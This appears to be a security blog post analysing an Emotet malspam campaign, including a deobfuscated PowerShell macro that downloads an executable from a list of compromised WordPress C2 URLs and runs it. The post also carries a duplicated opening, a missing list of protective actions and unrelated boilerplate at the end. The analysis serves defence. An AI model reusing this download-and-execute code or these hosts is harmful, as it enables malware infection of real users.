Emotet is a multipurpose malware which is mainly distributed through spam mails. It was first spotted in 2014 and was designed to steal bank account details.
Emotet is a multipurpose malware which is mainly distributed through spam mails. It was first spotted in 2014 and was designed to steal bank account details. Since then, there have been many different versions of the malware which include other functionalities such as malspam or delivery of other types of malware such as TrickBot or Ryuk.
Emotet is back since early September, infecting devices through botnet attacks by sending out large quantities of emails. Emotet targets everyone, although lately much activity has been detected towards countries such as Spain, Germany, Italy and England.
The infection usually starts on a Microsoft Office document which initiates a macro that tries to download Emotet from compromised WordPress sites that act as Command & Control.
On the following code block you can see a deobfuscated macro:
$HVS084rA='------'; # obfuscated on purpose
$Yt3Nqui = '768'; # malware file will be named 768.exe
$zHmAqiz='------'; # obfuscated on purpose
$FXYOYOI=$env:userprofile+''+$Yt3Nqui+'.exe';
$PIbfiXEH='bHtA6OA';
$GpQtLHc=.('new-ob'+'je'+'ct') NeT.WebcLIent;
# Command and controls
$t4Nj2JHD='https[:]//autorepuestosdml.com/wp-content/CiloXIptI/@https[:]//pep-egypt.com/eedy/xx3yspke7_l7jp5-430067348/@http[:]//danangluxury.com/wp-content/uploads/KTgQsblu/@http[:]//www.gcesab.com/wp-includes/customize/zUfJervuM/@https[:]//bondagetrip.com/wp-content/y0gm3xxs_hmnw8rq-764161699/'."SP`LIT"('@');
$bVnfHzcp='IEqNJ6';
foreach($Ej9owjPj in $t4Nj2JHD){
try{
# downloads file from C2 and saves it as the previously defined name
$GpQtLHc."D`O`WNlOAdf`IlE"($Ej9owjPj, $FXYOYOI);
$zcvi4r='zfVXqT';
If ((.('Ge'+'t'+'-Item') $FXYOYOI)."LEn`G`Th" -ge 34897){
# Starts a process with the downloaded file
[Diagnostics.Process]::"st`ART"($FXYOYOI);
$hqnUrFtL='Q25kFRKB';
break;
$wc7Zz3='aa2UOX'}
}
catch{}
}
$AuSWBW='obD7PFjS'
```All the macros we’ve seen lately in Spain have the very same structure although in the latest payloads we noticed that the string delimiter switched from @ to *. It is important to know that the payload is encoded in base64 and it is called using the parameter -EncodedCommand from PowerShell.
From the previous block code, we can see that the PowerShell process will try to download files from the C2 defined in the variable $t4Nj2JHD and start a process with the downloaded file, which is usually executable.
In order to avoid chain-based detection, Emotet’s download process can be made with Windows Management Instrumentation Provider Host (WmiPrvSe.exe) but executing the same PowerShell encoded command.
The downloaded malicious executables are usually located at the root of the user folder with three digits names, like 768.exe at the previous block code. It is possible to also find more dropped malware in System32, SysWOW64 folders or Trickbot and other generic malwares in a new generated folder in Appdata.
The Emotet malware campaign which is currently active has impacted many organizations and individuals, and once infected, Emotet spreads to other devices. This campaign is supported by at least two different groups and the payload is being actively updated from time to time.
In order to protect your infrastructure against those attacks you should take into consideration the following actions:
Get resources in your mailbox for free
We understand cybersecurity incidents as any event that can harm a system's confidentiality, integrity or availability.
The security professional's job has become an endless game of cat-and-mouse, continually pursuing invisible attackers that can out-think, out-run and outsmart most security systems.
In this period, organizations face immense challenges in terms of business continuity. But it is also a great opportunity to build the perfect remote environment.